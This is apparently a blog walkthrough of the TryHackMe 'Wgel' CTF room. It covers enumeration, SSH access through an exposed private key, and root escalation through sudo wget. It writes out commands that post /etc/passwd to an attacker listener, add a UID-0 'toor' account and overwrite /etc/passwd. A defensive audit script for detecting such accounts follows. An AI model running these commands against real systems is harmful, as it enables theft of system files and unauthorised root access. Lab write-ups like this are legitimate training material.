THM ROOM: Wgel CTF Walkthrough
Welcome to the Wgel TryHackMe room! In this blog post, we’ll walk through the step-by-step process of gaining root access to the target machine. Let’s get started!
TryHackMe Challenge Link: https://tryhackme.com/room/wgelctf
Reconnaissance — Nmap Scan:
The first step in any hacking endeavor is reconnaissance. We ran an Nmap scan with the following command to identify open ports and services on the target machine:
sudo nmap -sV -sS -A <IP>
Our scan revealed two open ports:
- Port 22 (SSH) running OpenSSH 7.2p2 on Ubuntu.
- Port 80 (HTTP) hosting an Apache web server on Ubuntu.
Directory Enumeration:
gobuster dir -u http://<IP>/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20
Our initial scan led us to a directory named “/sitemap,” which immediately caught our attention. We proceeded to enumerate the contents of this directory:
gobuster dir -u http://<IP>/sitemap/ -x php,txt -w /usr/share/wordlists/dirb/common.txt -t 20
Enumeration revealed a “.ssh” directory, and while exploring it I discovered a file named “id_rsa.” This is a significant discovery, as it could potentially provide us with SSH access.
The id_rsa file contains a private key, which authenticates to SSH in place of a password; however, we do not know the username it belongs to. After some digging, I discovered something interesting in the source code of Apache’s default webpage.
Initial Foothold — SSH Access:
ssh -i id_rsa jessie@<IP>
Our SSH connection was successful, granting us initial access to the system. However, the real challenge was yet to come.
Exploring further, we found the user flag.
Privilege Escalation:
Now that we had access as the user “jessie,” our next goal was to escalate privileges to root.
I checked “sudo -l” and discovered that the wget program can be launched as root, making it a possible attack vector for privilege escalation.
There are various ways to escalate privileges from wget, but here is the simplest.
Here are the steps I took to gain root access:
- We leveraged the “sudo /usr/bin/wget” command to send a file, in this case “/etc/passwd,” to our own listener. (TUN0_IP = Kali_Linux_IP)
sudo /usr/bin/wget --post-file=/etc/passwd http://<YOUR_TUN0_IP>:5555
- We listened for incoming connections and captured the “/etc/passwd” file.
nc -lvnp 5555
- We appended a new user with UID 0 (root privileges) to the captured “passwd” file.
echo "toor:`openssl passwd toor`:0:0:root:/root:/bin/bash" >> passwd
- We hosted the modified “/etc/passwd” file on a local HTTP server.
python3 -m http.server
- We used “wget” as root to fetch the hosted file and overwrite “/etc/passwd” with it, effectively creating a new user with root access.
sudo /usr/bin/wget http://<YOUR_TUN0_IP>:8000/passwd -O /etc/passwd
- Finally, we switched to the newly created user and gained root access to the system. username: toor, password: toor
su toor
# will ask for password
# Password is toor
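The escalation above works by appending a second UID-0 entry to /etc/passwd and writing the file back as root. From the defender’s side, that leaves an obvious trace: an account other than “root” with UID 0 or GID 0, and a password hash stored inline instead of the usual “x” pointing to /etc/shadow. The following audit script is an added example and is not part of the original post or the TryHackMe room; the sample passwd content and the “toor” hash it contains are constructed placeholders, and audit_file is an assumed helper for running the same check against a live system.

```python
"""Audit a passwd-format file for extra UID-0 (root-equivalent) accounts.

Added example for this walkthrough, not part of the original post. It flags
every account other than 'root' that carries UID 0 or GID 0, every entry
whose password field holds an inline hash rather than 'x' (a password kept
outside /etc/shadow), and any malformed line that would hide from a naive
check.
"""

from dataclasses import dataclass

# Constructed sample: a small passwd file with the injected 'toor' line from
# the walkthrough appended. The hash value is a placeholder, not a real hash.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jessie:x:1000:1000:jessie,,,:/home/jessie:/bin/bash
toor:$1$PLACEHOLDERHASH:0:0:root:/root:/bin/bash
"""


@dataclass
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd-format text. Returns (entries, bad_lines) where bad_lines
    holds (line_number, raw_line) for lines that are not seven colon-separated
    fields with numeric UID/GID."""
    entries, bad = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            bad.append((lineno, raw))
            continue
        try:
            uid, gid = int(fields[2]), int(fields[3])
        except ValueError:
            bad.append((lineno, raw))
            continue
        entries.append(PasswdEntry(fields[0], fields[1], uid, gid, fields[5], fields[6]))
    return entries, bad


def find_rogue_root_accounts(text):
    """Return a list of (finding_kind, subject) tuples:
      ('uid0', name)         account other than 'root' with UID 0 or GID 0
      ('inline_hash', name)  password field is a hash rather than x/*/!/empty
      ('malformed', 'line N') line that did not parse as a passwd entry
    """
    entries, bad = parse_passwd(text)
    findings = []
    for e in entries:
        if e.name != "root" and (e.uid == 0 or e.gid == 0):
            findings.append(("uid0", e.name))
        if e.passwd not in ("x", "*", "!", ""):
            findings.append(("inline_hash", e.name))
    for lineno, _raw in bad:
        findings.append(("malformed", f"line {lineno}"))
    return findings


def audit_file(path="/etc/passwd"):
    """Assumed helper: run the same check against a file on disk."""
    with open(path, encoding="utf-8") as fh:
        return find_rogue_root_accounts(fh.read())


if __name__ == "__main__":
    for kind, subject in find_rogue_root_accounts(SAMPLE_PASSWD):
        print(f"{kind}: {subject}")
```

Running it against the constructed sample reports the injected account twice (once as a UID-0 duplicate, once for its inline hash); the same logic, paired with a check of “sudo -l” output for binaries that can read or write arbitrary files as root, is a cheap periodic control on a host like this one.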
Retrieving Flags:
With root access secured, we were able to retrieve both the user and root flags.
- The user flag was located in the “/home/jessie/Documents/user_flag.txt” file.
- The root flag was stored in the “/root/root_flag.txt” file.